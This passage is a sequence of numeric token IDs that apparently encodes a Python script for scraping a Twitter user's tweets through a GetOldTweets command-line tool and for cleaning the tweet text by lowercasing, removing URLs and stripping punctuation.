1441,
10352,
628,
220,
220,
220,
1303,
29113,
14468,
7804,
4242,
2,
198,
220,
220,
220,
1303,
25458,
284,
6431,
2836,
15264,
12665,
351,
198,
220,
220,
220,
1303,
7349,
3497,
19620,
32665,
1039,
198,
220,
220,
220,
1303,
29113,
14468,
7804,
4242,
2,
628,
220,
220,
220,
825,
651,
62,
7220,
62,
83,
732,
1039,
7,
944,
11,
2836,
11,
3509,
62,
83,
732,
1039,
11,
923,
62,
4475,
28,
14202,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
886,
62,
4475,
28,
14202,
11,
477,
62,
83,
732,
1039,
28,
17821,
11,
1441,
62,
1370,
28,
17821,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
16409,
3509,
62,
83,
732,
1039,
422,
3009,
15264,
286,
2836,
13,
31254,
284,
670,
198,
220,
220,
220,
220,
220,
220,
220,
1365,
618,
923,
290,
886,
9667,
389,
3017,
13,
383,
4504,
12665,
198,
220,
220,
220,
220,
220,
220,
220,
2291,
12665,
319,
262,
923,
62,
4475,
11,
290,
510,
284,
357,
4360,
407,
1390,
8,
12665,
198,
220,
220,
220,
220,
220,
220,
220,
319,
262,
886,
62,
4475,
13,
628,
220,
220,
220,
220,
220,
220,
220,
1002,
691,
281,
886,
62,
4475,
318,
2810,
11,
788,
262,
12665,
389,
16499,
19528,
198,
220,
220,
220,
220,
220,
220,
220,
287,
640,
3599,
379,
262,
886,
3128,
290,
8282,
1566,
3509,
62,
83,
732,
1039,
198,
220,
220,
220,
220,
220,
220,
220,
423,
587,
1043,
13,
628,
220,
220,
220,
220,
220,
220,
220,
7921,
274,
9483,
3706,
416,
17044,
20579,
16499,
326,
4909,
12665,
198,
220,
220,
220,
220,
220,
220,
220,
287,
2168,
286,
269,
21370,
3696,
13,
628,
220,
220,
220,
220,
220,
220,
220,
2836,
357,
8841,
2599,
3009,
5412,
286,
2836,
11,
304,
13,
70,
13,
2318,
441,
672,
1689,
198,
220,
220,
220,
220,
220,
220,
220,
3509,
62,
83,
732,
1039,
357,
600,
2599,
1271,
286,
12665,
284,
1441,
329,
326,
2836,
26,
900,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3509,
62,
83,
732,
1039,
284,
532,
16,
284,
1441,
477,
12665,
287,
15264,
198,
220,
220,
220,
220,
220,
220,
220,
923,
62,
4475,
357,
8841,
2599,
3599,
3128,
329,
2989,
286,
1296,
366,
4626,
12,
2931,
12,
1270,
1,
198,
220,
220,
220,
220,
220,
220,
220,
886,
62,
4475,
357,
8841,
2599,
7464,
3128,
329,
2989,
286,
1296,
366,
4626,
12,
2931,
12,
1270,
1,
198,
220,
220,
220,
220,
220,
220,
220,
477,
62,
83,
732,
1039,
357,
30388,
2599,
1771,
284,
779,
366,
4852,
62,
83,
732,
1039,
1,
393,
366,
439,
62,
83,
732,
1039,
1,
20129,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
17379,
2393,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
62,
1370,
357,
30388,
2599,
1771,
284,
1441,
3128,
319,
938,
6126,
4504,
26,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2622,
329,
2163,
326,
1838,
5100,
3848,
284,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
428,
2163,
11,
304,
13,
70,
13,
651,
62,
439,
62,
7220,
62,
83,
732,
1039,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
923,
62,
2435,
796,
640,
13,
2435,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
3853,
543,
17379,
2393,
284,
779,
198,
220,
220,
220,
220,
220,
220,
220,
17379,
62,
8841,
796,
2116,
13,
9491,
62,
43551,
62,
6978,
1343,
31051,
23442,
62,
4852,
62,
83,
732,
1039,
13,
9491,
6,
198,
220,
220,
220,
220,
220,
220,
220,
611,
477,
62,
83,
732,
1039,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
17379,
62,
8841,
796,
2116,
13,
9491,
62,
43551,
62,
6978,
1343,
31051,
23442,
62,
439,
62,
83,
732,
1039,
13,
9491,
6,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
2251,
2989,
4731,
198,
220,
220,
220,
220,
220,
220,
220,
2836,
62,
8841,
796,
705,
29460,
11639,
1343,
2836,
198,
220,
220,
220,
220,
220,
220,
220,
17266,
742,
732,
1039,
62,
8841,
796,
705,
2611,
742,
732,
1039,
11639,
1343,
965,
7,
9806,
62,
83,
732,
1039,
8,
628,
220,
220,
220,
220,
220,
220,
220,
611,
923,
62,
4475,
318,
407,
6045,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1201,
62,
8841,
796,
705,
20777,
11639,
1343,
923,
62,
4475,
198,
220,
220,
220,
220,
220,
220,
220,
611,
886,
62,
4475,
318,
407,
6045,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1566,
62,
8841,
796,
705,
28446,
11639,
1343,
886,
62,
4475,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
2251,
5072,
62,
23442,
13,
40664,
2393,
286,
12665,
351,
777,
2989,
10007,
198,
220,
220,
220,
220,
220,
220,
220,
611,
923,
62,
4475,
318,
6045,
290,
886,
62,
4475,
318,
6045,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
850,
14681,
13,
13345,
7,
17816,
12355,
3256,
705,
12,
9491,
3256,
17379,
62,
8841,
11,
2836,
62,
8841,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
17266,
742,
732,
1039,
62,
8841,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
923,
62,
4475,
318,
6045,
290,
886,
62,
4475,
318,
407,
6045,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
850,
14681,
13,
13345,
7,
17816,
12355,
3256,
705,
12,
9491,
3256,
17379,
62,
8841,
11,
2836,
62,
8841,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1566,
62,
8841,
11,
17266,
742,
732,
1039,
62,
8841,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
850,
14681,
13,
13345,
7,
17816,
12355,
3256,
705,
12,
9491,
3256,
17379,
62,
8841,
11,
2836,
62,
8841,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1201,
62,
8841,
11,
1566,
62,
8841,
11,
17266,
742,
732,
1039,
62,
8841,
12962,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
1064,
3128,
319,
938,
6126,
287,
428,
2393,
357,
259,
938,
1627,
286,
2393,
8,
198,
220,
220,
220,
220,
220,
220,
220,
938,
62,
1370,
796,
7894,
263,
13,
13199,
7,
9654,
10786,
22915,
62,
23442,
13,
40664,
33809,
352,
38381,
15,
60,
198,
220,
220,
220,
220,
220,
220,
220,
3128,
62,
9150,
796,
938,
62,
1370,
13,
19796,
10786,
26,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
3128,
62,
8841,
796,
938,
62,
1370,
58,
4475,
62,
9150,
10,
16,
25,
4475,
62,
9150,
10,
1157,
60,
198,
220,
220,
220,
220,
220,
220,
220,
3128,
62,
8841,
796,
2116,
13557,
1102,
1851,
62,
4475,
62,
1462,
62,
20307,
7,
4475,
62,
8841,
8,
628,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
7575,
284,
2824,
1600,
965,
7,
9806,
62,
83,
732,
1039,
828,
366,
83,
732,
1039,
25,
1600,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2835,
19510,
2435,
13,
2435,
3419,
532,
923,
62,
2435,
20679,
1899,
1539,
16,
828,
366,
1084,
1769,
1,
628,
220,
220,
220,
220,
220,
220,
220,
611,
1441,
62,
1370,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
3128,
62,
8841,
628,
220,
220,
220,
825,
651,
62,
439,
62,
7220,
62,
83,
732,
1039,
7,
944,
11,
2836,
11,
12665,
62,
525,
62,
5143,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
8229,
477,
12665,
287,
257,
2836,
338,
15264,
13,
770,
318,
3306,
198,
220,
220,
220,
220,
220,
220,
220,
284,
466,
287,
37830,
1201,
530,
869,
284,
651,
62,
7220,
62,
83,
732,
1039,
857,
407,
1441,
198,
220,
220,
220,
220,
220,
220,
220,
477,
286,
262,
12665,
357,
18820,
867,
287,
530,
1057,
9457,
262,
3992,
12,
1416,
18886,
198,
220,
220,
220,
220,
220,
220,
220,
11244,
286,
3497,
19620,
32665,
1039,
737,
383,
12665,
389,
7448,
355,
2168,
286,
198,
220,
220,
220,
220,
220,
220,
220,
269,
21370,
3696,
656,
5072,
9483,
3706,
416,
20579,
286,
17044,
2836,
13,
628,
220,
220,
220,
220,
220,
220,
220,
383,
2457,
3128,
318,
530,
1110,
706,
262,
1459,
3128,
11,
1201,
12665,
389,
198,
220,
220,
220,
220,
220,
220,
220,
4504,
510,
284,
357,
4360,
407,
1390,
8,
262,
886,
62,
4475,
287,
651,
62,
7220,
62,
83,
732,
1039,
198,
220,
220,
220,
220,
220,
220,
220,
2163,
13,
628,
220,
220,
220,
220,
220,
220,
220,
770,
2163,
481,
1441,
14184,
16856,
286,
617,
12665,
284,
307,
1654,
477,
198,
220,
220,
220,
220,
220,
220,
220,
12665,
389,
6492,
532,
777,
460,
307,
15254,
416,
2391,
12047,
198,
220,
220,
220,
220,
220,
220,
220,
14184,
16856,
287,
262,
2420,
5721,
286,
7186,
19798,
292,
1366,
14535,
13,
628,
220,
220,
220,
220,
220,
220,
220,
15553,
6032,
10143,
284,
1441,
790,
2060,
6126,
11,
475,
23007,
198,
220,
220,
220,
220,
220,
220,
220,
749,
31034,
5774,
1411,
329,
2318,
441,
672,
1689,
8,
532,
1266,
2854,
618,
198,
220,
220,
220,
220,
220,
220,
220,
12665,
62,
525,
62,
5143,
318,
1088,
5323,
13,
628,
220,
220,
220,
220,
220,
220,
220,
7921,
274,
25,
9483,
357,
13190,
416,
20579,
16499,
8,
286,
269,
21370,
3696,
628,
220,
220,
220,
220,
220,
220,
220,
2836,
357,
8841,
2599,
17044,
5412,
286,
2836,
11,
304,
13,
70,
13,
366,
5657,
441,
672,
1689,
1,
198,
220,
220,
220,
220,
220,
220,
220,
12665,
62,
525,
62,
5143,
357,
600,
2599,
703,
867,
12665,
284,
2834,
287,
1123,
1057,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
18703,
262,
3128,
530,
1110,
2651,
422,
4504,
1110,
618,
4585,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
651,
62,
7220,
62,
83,
732,
1039,
284,
307,
1654,
477,
12665,
287,
32997,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
2837,
389,
4504,
532,
29315,
3751,
326,
12665,
319,
262,
5743,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
1022,
3128,
4539,
460,
307,
2626,
4306,
628,
220,
220,
220,
220,
220,
220,
220,
923,
62,
2435,
796,
640,
13,
2435,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
31337,
278,
12665,
351,
1600,
965,
7,
83,
732,
1039,
62,
525,
62,
5143,
828,
366,
83,
732,
1039,
583,
1057,
526,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
2251,
9483,
326,
12665,
481,
307,
7448,
656,
198,
220,
220,
220,
220,
220,
220,
220,
850,
14681,
13,
13345,
7,
17816,
28015,
15908,
3256,
2836,
12962,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
900,
530,
1110,
287,
2003,
523,
326,
477,
12665,
510,
284,
1909,
389,
4504,
26,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
3306,
780,
12665,
389,
4504,
319,
9667,
510,
284,
475,
407,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
1390,
886,
3128,
198,
220,
220,
220,
220,
220,
220,
220,
2457,
62,
28446,
796,
965,
7,
19608,
8079,
13,
19608,
8079,
13,
2197,
3419,
1343,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4818,
8079,
13,
16514,
276,
12514,
7,
12545,
28,
16,
4008,
58,
25,
940,
60,
198,
220,
220,
220,
220,
220,
220,
220,
1566,
796,
2457,
62,
28446,
198,
220,
220,
220,
220,
220,
220,
220,
2555,
62,
12947,
796,
6407,
198,
220,
220,
220,
220,
220,
220,
220,
1057,
62,
24588,
796,
352,
628,
220,
220,
220,
220,
220,
220,
220,
981,
2555,
62,
12947,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
31337,
278,
1057,
1600,
1057,
62,
24588,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1057,
62,
24588,
15853,
352,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
869,
2836,
2163,
290,
651,
3128,
286,
938,
6126,
1043,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
938,
62,
4475,
796,
2116,
13,
1136,
62,
7220,
62,
83,
732,
1039,
7,
7220,
11,
12665,
62,
525,
62,
5143,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
886,
62,
4475,
28,
28446,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
36265,
1123,
5072,
2393,
290,
1234,
656,
649,
9483,
532,
5072,
2393,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
318,
3706,
416,
1566,
3128,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
649,
62,
7753,
62,
24886,
796,
2836,
1343,
31051,
6,
1343,
1566,
1343,
45302,
40664,
6,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
850,
14681,
13,
13345,
7,
17816,
76,
85,
3256,
705,
22915,
62,
23442,
13,
40664,
3256,
649,
62,
7753,
62,
24886,
12962,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
611,
938,
62,
4475,
318,
257,
3128,
5120,
355,
3487,
532,
611,
262,
938,
62,
4475,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
5818,
470,
3421,
11,
5298,
2912,
2174,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
2116,
13557,
12102,
378,
62,
4475,
7,
12957,
62,
4475,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1566,
62,
40191,
62,
820,
62,
15252,
796,
4818,
8079,
13,
19608,
8079,
13,
2536,
457,
524,
7,
28446,
11,
705,
4,
56,
12,
4,
76,
12,
4,
67,
11537,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
532,
4818,
8079,
13,
16514,
276,
12514,
7,
12545,
28,
16,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1566,
62,
40191,
62,
820,
796,
965,
7,
28446,
62,
40191,
62,
820,
62,
15252,
38381,
25,
940,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
938,
62,
4475,
6624,
1566,
62,
40191,
62,
820,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
422,
29315,
3360,
257,
12405,
286,
867,
12665,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
481,
651,
366,
301,
1347,
1,
319,
257,
1110,
890,
878,
5323,
12665,
423,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
587,
4251,
532,
4610,
318,
655,
18703,
1110,
355,
6678,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
32665,
1039,
15264,
1253,
12061,
416,
691,
530,
1110,
532,
743,
366,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
31227,
4025,
12665,
62,
525,
62,
5143,
11,
393,
714,
655,
307,
366,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
16338,
336,
10381,
287,
42517,
1112,
15264,
526,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1566,
796,
938,
62,
4475,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
428,
18703,
318,
284,
3368,
6078,
12665,
379,
262,
5743,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
1022,
3128,
20743,
532,
29315,
3751,
484,
460,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
307,
2626,
1231,
428,
49052,
532,
428,
1724,
618,
12665,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
389,
1100,
612,
743,
307,
14184,
16856,
326,
2421,
39948,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
649,
62,
28446,
62,
4475,
62,
15252,
796,
4818,
8079,
13,
19608,
8079,
13,
2536,
457,
524,
7,
12957,
62,
4475,
11,
705,
4,
56,
12,
4,
76,
12,
4,
67,
11537,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1343,
4818,
8079,
13,
16514,
276,
12514,
7,
12545,
28,
16,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1566,
796,
965,
7,
3605,
62,
28446,
62,
4475,
62,
15252,
38381,
25,
940,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2555,
62,
12947,
796,
10352,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
900,
1366,
3108,
284,
649,
5072,
9483,
284,
1100,
287,
649,
12665,
3538,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
7890,
62,
6978,
796,
2836,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
14957,
640,
284,
2824,
12665,
25,
1600,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2835,
19510,
2435,
13,
2435,
3419,
532,
923,
62,
2435,
20679,
1899,
1539,
16,
828,
366,
1084,
1769,
1,
628,
220,
220,
220,
1303,
29113,
14468,
7804,
4242,
198,
220,
220,
220,
1303,
25458,
284,
3424,
290,
778,
1726,
12665,
357,
26949,
973,
198,
220,
220,
220,
1303,
878,
5874,
15210,
8,
198,
220,
220,
220,
1303,
29113,
14468,
7804,
4242,
628,
220,
220,
220,
825,
1394,
62,
28665,
62,
1659,
62,
14986,
62,
83,
732,
1039,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
6245,
1258,
257,
5721,
286,
2116,
13,
83,
732,
1039,
62,
7568,
284,
262,
2656,
11,
555,
282,
4400,
12665,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1680,
307,
4465,
329,
7208,
706,
12724,
13,
628,
220,
220,
220,
220,
220,
220,
220,
770,
815,
307,
1760,
878,
597,
12724,
5499,
389,
5625,
284,
262,
198,
220,
220,
220,
220,
220,
220,
220,
366,
5239,
1,
5721,
286,
2116,
13,
83,
732,
1039,
62,
7568,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
14692,
14986,
62,
83,
732,
1039,
8973,
796,
2116,
13,
83,
732,
1039,
62,
7568,
14692,
5239,
8973,
628,
220,
220,
220,
825,
2793,
62,
83,
732,
1039,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
406,
3618,
1339,
286,
2420,
287,
477,
262,
12665,
11,
514,
1142,
1047,
11,
15802,
290,
198,
220,
220,
220,
220,
220,
220,
220,
20267,
3775,
287,
262,
12665,
62,
7568,
1366,
14535,
11,
611,
262,
1366,
14535,
468,
883,
198,
220,
220,
220,
220,
220,
220,
220,
15180,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
5721,
62,
14933,
796,
1351,
7,
944,
13,
83,
732,
1039,
62,
7568,
13,
28665,
82,
13,
27160,
8,
198,
220,
220,
220,
220,
220,
220,
220,
611,
366,
29460,
1,
287,
5721,
62,
14933,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
14692,
29460,
8973,
796,
2116,
13,
83,
732,
1039,
62,
7568,
13,
29460,
13,
2536,
13,
21037,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
611,
366,
5239,
1,
287,
5721,
62,
14933,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
14692,
5239,
8973,
796,
2116,
13,
83,
732,
1039,
62,
7568,
13,
5239,
13,
2536,
13,
21037,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
611,
366,
434,
507,
1,
287,
5721,
62,
14933,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
14692,
434,
507,
8973,
796,
2116,
13,
83,
732,
1039,
62,
7568,
13,
434,
507,
13,
2536,
13,
21037,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
611,
366,
17831,
31499,
1,
287,
5721,
62,
14933,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
14692,
17831,
31499,
8973,
796,
2116,
13,
83,
732,
1039,
62,
7568,
13,
17831,
31499,
13,
2536,
13,
21037,
3419,
628,
220,
220,
220,
825,
1394,
62,
8807,
62,
46903,
1098,
62,
83,
7277,
62,
5239,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
9175,
82,
691,
12665,
810,
6126,
2420,
318,
28000,
1098,
13,
770,
10532,
262,
198,
220,
220,
220,
220,
220,
220,
220,
12209,
6126,
326,
468,
257,
11013,
45,
1988,
287,
27039,
11,
543,
4329,
257,
12178,
198,
220,
220,
220,
220,
220,
220,
220,
618,
1100,
656,
12665,
62,
7568,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
14692,
5239,
62,
4906,
8973,
796,
2116,
13,
83,
732,
1039,
62,
7568,
14692,
5239,
1,
4083,
8899,
7,
50033,
2420,
25,
2099,
7,
5239,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
796,
2116,
13,
83,
732,
1039,
62,
7568,
58,
944,
13,
83,
732,
1039,
62,
7568,
13,
5239,
62,
4906,
6624,
28000,
1098,
60,
198,
220,
220,
220,
220,
220,
220,
220,
1619,
2116,
13,
83,
732,
1039,
62,
7568,
14692,
5239,
62,
4906,
8973,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
797,
9630,
1366,
14535,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
13,
9630,
796,
2837,
7,
11925,
7,
944,
13,
83,
732,
1039,
62,
7568,
4008,
628,
220,
220,
220,
825,
4808,
28956,
62,
6371,
82,
62,
6738,
62,
29762,
62,
83,
7277,
7,
944,
11,
6126,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
17220,
2956,
7278,
422,
2420,
286,
257,
2060,
6126,
13,
628,
220,
220,
220,
220,
220,
220,
220,
770,
3544,
21015,
6126,
32096,
5888,
326,
18297,
617,
12665,
475,
198,
220,
220,
220,
220,
220,
220,
220,
1595,
470,
651,
9174,
510,
351,
6181,
40364,
2263,
1165,
890,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
279,
796,
256,
34788,
13,
46677,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
1255,
796,
279,
13,
29572,
7,
83,
7277,
8,
198,
220,
220,
220,
220,
220,
220,
220,
329,
2124,
287,
1255,
13,
6371,
82,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6126,
796,
6126,
13,
33491,
7,
87,
11,
366,
4943,
198,
220,
220,
220,
220,
220,
220,
220,
6126,
796,
6126,
13,
36311,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
6126,
628,
220,
220,
220,
825,
4781,
62,
6371,
82,
62,
6738,
62,
83,
732,
1039,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
17220,
2956,
7278,
422,
477,
12665,
287,
2116,
13,
83,
732,
1039,
62,
7568,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
923,
62,
2435,
796,
640,
13,
2435,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
8413,
5165,
2956,
7278,
422,
12665,
9313,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
1212,
743,
1011,
257,
5664,
532,
12724,
2494,
318,
546,
7337,
11,
830,
1,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
12665,
583,
5664,
1,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
14692,
5239,
8973,
796,
2116,
13,
83,
732,
1039,
62,
7568,
14692,
5239,
1,
4083,
8899,
7,
944,
13557,
28956,
62,
6371,
82,
62,
6738,
62,
29762,
62,
83,
7277,
8,
198,
220,
220,
220,
220,
220,
220,
220,
2431,
62,
1462,
62,
20751,
796,
357,
2435,
13,
2435,
3419,
532,
923,
62,
2435,
20679,
1899,
13,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
7575,
284,
1844,
25,
1600,
2835,
7,
1084,
1769,
62,
1462,
62,
20751,
11,
18,
828,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
1084,
1769,
1,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
32665,
1039,
20750,
583,
5664,
25,
1600,
2835,
7,
11925,
7,
944,
13,
83,
732,
1039,
62,
7568,
20679,
1084,
1769,
62,
1462,
62,
20751,
11,
352,
8,
628,
220,
220,
220,
825,
4781,
62,
79,
16260,
2288,
62,
6738,
62,
83,
732,
1039,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
18508,
2219,
21025,
2288,
422,
12665,
287,
2116,
13,
83,
732,
1039,
62,
7568,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
14692,
5239,
8973,
796,
2116,
13,
83,
732,
1039,
62,
7568,
14692,
5239,
1,
4083,
39014,
7,
50033,
2124,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
4458,
22179,
26933,
72,
329,
1312,
287,
2124,
611,
1312,
407,
287,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
